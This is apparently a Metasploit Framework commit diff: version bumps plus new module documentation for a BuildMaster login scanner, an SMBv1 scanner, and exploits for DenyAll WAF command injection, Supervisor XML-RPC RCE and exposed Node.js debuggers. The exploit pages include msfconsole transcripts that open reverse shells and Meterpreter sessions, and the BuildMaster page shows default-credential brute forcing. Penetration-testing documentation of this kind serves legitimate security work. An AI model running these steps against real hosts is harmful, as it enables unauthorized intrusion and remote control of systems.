sempervictus
diff --git a/‎.ruby-version
Lines changed: 1 addition & 1 deletion b/‎.ruby-version
Lines changed: 1 addition & 1 deletion
diff --git a/‎.travis.yml
Lines changed: 2 additions & 2 deletions b/‎.travis.yml
Lines changed: 2 additions & 2 deletions
diff --git a/‎Dockerfile
Lines changed: 1 addition & 1 deletion b/‎Dockerfile
Lines changed: 1 addition & 1 deletion
diff --git a/‎Gemfile.lock
Lines changed: 7 additions & 9 deletions b/‎Gemfile.lock
Lines changed: 7 additions & 9 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/http/buildmaster_login.md
Lines changed: 59 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/http/buildmaster_login.md
Lines changed: 59 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/smb/smb1.md
Lines changed: 55 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/smb/smb1.md
Lines changed: 55 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/denyall_waf_exec.md
Lines changed: 47 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/denyall_waf_exec.md
Lines changed: 47 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
Lines changed: 78 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
Lines changed: 78 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md
Lines changed: 64 additions & 0 deletions b/‎documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md
Lines changed: 64 additions & 0 deletions
@@ -1 +1 @@
-2.4.1
+2.4.2
@@ -12,8 +12,8 @@ addons:
 language: ruby
 rvm:
   - '2.2'
-  - '2.3.4'
-  - '2.4.1'
+  - '2.3.5'
+  - '2.4.2'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
 
@@ -1,4 +1,4 @@
-FROM ruby:2.4.1-alpine
+FROM ruby:2.4.2-alpine
 MAINTAINER Rapid7
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
 
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.8)
+    metasploit-framework (4.16.9)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -17,7 +17,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.7)
+      metasploit-payloads (= 1.3.8)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.2.2)
       msgpack
@@ -150,7 +150,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.7)
+    metasploit-payloads (1.3.8)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -163,16 +163,16 @@ GEM
       recog (~> 2.0)
     metasploit_payloads-mettle (0.2.2)
     method_source (0.8.2)
-    mini_portile2 (2.2.0)
+    mini_portile2 (2.3.0)
     minitest (5.10.3)
     msgpack (1.1.0)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
     network_interface (0.0.2)
     nexpose (7.0.1)
-    nokogiri (1.8.0)
-      mini_portile2 (~> 2.2.0)
+    nokogiri (1.8.1)
+      mini_portile2 (~> 2.3.0)
     octokit (4.7.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
@@ -193,10 +193,9 @@ GEM
       activerecord (>= 4.0.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.10.4)
+    pry (0.11.0)
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
-      slop (~> 3.4)
     public_suffix (3.0.0)
     rack (1.6.8)
     rack-test (0.6.3)
@@ -308,7 +307,6 @@ GEM
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
-    slop (3.6.0)
     sqlite3 (1.3.13)
     sshkey (1.9.0)
     thor (0.20.0)
 
@@ -0,0 +1,59 @@
+## Description
+
+This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
+The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
+
+## Vulnerable Application
+
+[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
+
+[Inedo website](http://inedo.com/)
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/buildmaster_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: Set credentials
+5. Do: ```run```
+6. You should see the module attempting to log in.
+
+## Scenarios
+
+### Attempt to login with the default credentials.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) >
+```
+
+### Brute force with credentials from file.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login 
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
+USERPASS_FILE => ~/BuildMasterCreds.txt
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"test"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"test"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"wrong"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"wrong"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) > 
+```
@@ -0,0 +1,55 @@
+# Description
+This module scans for hosts that support the SMBv1 protocol.  It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
+```PC NETWORK PROGRAM 1.0
+LANMAN1.0
+Windows for Workgroups 3.1a
+LM1.2X002
+LANMAN2.1
+NT LM 0.12
+```
+If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
+If the SMB server does not support SMBv1 a RST will be sent.
+
+___
+# Usage
+
+The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
+
+#### A host that does support SMBv1.
+
+```
+msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
+msf auxiliary(smb1) > set RHOSTS x.x.x.x
+RHOSTS => x.x.x.x
+msf auxiliary(smb1) > run
+
+[+] x.x.x.x:445        - x.x.x.x supports SMBv1 dialect.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(smb1) > services -S x.x.x.x
+
+Services
+========
+
+host        port  proto  name  state  info
+----        ----  -----  ----  -----  ----
+x.x.x.x 445   tcp    smb1  open
+```
+
+#### A host that does not support SMBv1
+
+```
+msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
+msf auxiliary(smb1) > set RHOSTS y.y.y.y
+RHOSTS => y.y.y.y
+msf auxiliary(smb1) > run
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+___
+
+
+## Options
+
+The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation.  It can also be set using hosts from the database using ```hosts -R```.
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
+
+It's possible to have trial demo for 15 days at Amazon Marketplace.
+[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
+
+You just need to follow instruction above URL.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use use exploit/linux/http/denyall_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `iToken` value extraction.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/denyall_exec 
+msf exploit(denyall_exec) > 
+msf exploit(denyall_exec) > set RHOST 35.176.123.128
+RHOST => 35.176.123.128
+msf exploit(denyall_exec) > set LHOST 35.12.3.3
+LHOST => 35.12.3.3
+msf exploit(denyall_exec) > check
+[*] 35.176.123.128:3001 The target appears to be vulnerable.
+msf exploit(denyall_exec) > exploit 
+
+[*] Started reverse TCP handler on 35.12.3.3:4444 
+[*] Extracting iToken value from unauthenticated accessible endpoint.
+[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
+[*] Trigerring command injection vulnerability with  iToken value.
+[*] Sending stage (40411 bytes) to 35.176.123.128
+[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
+
+meterpreter > pwd
+/var/log/denyall/reverseproxy
+meterpreter >
+```
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+  This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
+  
+  This has been tested with versions 3.2.0 and 3.3.2
+
+### Creating A Testing Environment
+
+  At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
+
+  1. ```sudo apt-get install supervisor```
+  2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
+
+    ```
+    [inet_http_server]         ; inet (TCP) server disabled by default
+    port=:9001        ; ip_address:port specifier, *:port for all iface
+    username=user              ; default is no username (open server)
+    password=123               ; default is no password (open server)
+    ```
+
+  3. Restart the service: `sudo service supervisor restart`
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```set httpusername user```
+  5. ```set httppassword 123```
+  6. ```exploit```
+  7. A meterpreter session should have been opened successfully
+
+## Options
+
+  **HttpUsername**
+
+  Username for HTTP basic auth which is set in the conf file(optional)
+
+  **HttpPassword**
+
+  Password for HTTP basic auth which is set in the conf file(optional)
+
+  **TARGETURI**
+
+  The path to the XML-RPC endpoint
+
+## Scenarios
+
+### Supervisor 3.2.0 on Xubuntu 16.04
+
+```
+msf > use exploit/linux/http/supervisor_xmlrpc_exec 
+msf exploit(supervisor_xmlrpc_exec) > set httpusername user
+httpusername => user
+msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
+httppassword => 123
+msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
+lhost => 192.168.0.2
+msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
+rhost => 192.168.0.19
+msf exploit(supervisor_xmlrpc_exec) > check 
+
+[*] Extracting version from web interface..
+[*] Using basic auth (user:123)
+[+] Vulnerable version found: 3.2.0
+[*] 192.168.0.19:9001 The target appears to be vulnerable.
+msf exploit(supervisor_xmlrpc_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
+[*] Using basic auth (user:123)
+[*] Sending stage (2878872 bytes) to 192.168.0.19
+[*] Command Stager progress - 100.00% done (782/782 bytes)
+[+] Request timeout, usually indicates success. Passing to handler..
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
+
+meterpreter > 
+```
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+Current and historical versions of node (or any JS env based on the 
+V8 JS engine) have this functionality and could be exploitable if
+configured to expose the JS port on an untrusted interface.
+
+Install a version of node using any of the normal methods: 
+* Vendor: https://nodejs.org/en/download/package-manager/
+* Distro: `sudo apt-get install nodejs` 
+
+Alternately, use standard node docker containers as targets:
+```
+$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
+```
+(Others at https://hub.docker.com/_/node/)
+
+Tested on Node 7.x, 6.x, 4.x
+
+## Verification Steps
+
+1. Run a node process exposing the debug port
+```
+node --debug=0.0.0.0:5858 
+```
+
+2. Exploit it and catch the callback:
+
+```
+msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
+```
+(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
+
+Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity 
+(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
+
+
+## Scenarios
+
+### Example Run (Node 7.x)
+
+Victim:
+```
+$ node --version
+v7.10.0
+$ node --debug=0.0.0.0:5858
+(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
+Debugger listening on 0.0.0.0:5858
+>
+(To exit, press ^C again or type .exit)
+```
+
+Attacker:
+```
+msf exploit(nodejs_v8_debugger) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 127.0.0.1:5858 - Sending 745 byte payload...
+[*] 127.0.0.1:5858 - Got success response
+[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
+
+id
+(redacted)
+``` 
+
Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-FROM ruby:2.4.1-alpine`
	`1`	`+FROM ruby:2.4.2-alpine`
`2`	`2`	`MAINTAINER Rapid7`
`3`	`3`
`4`	`4`	`ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"`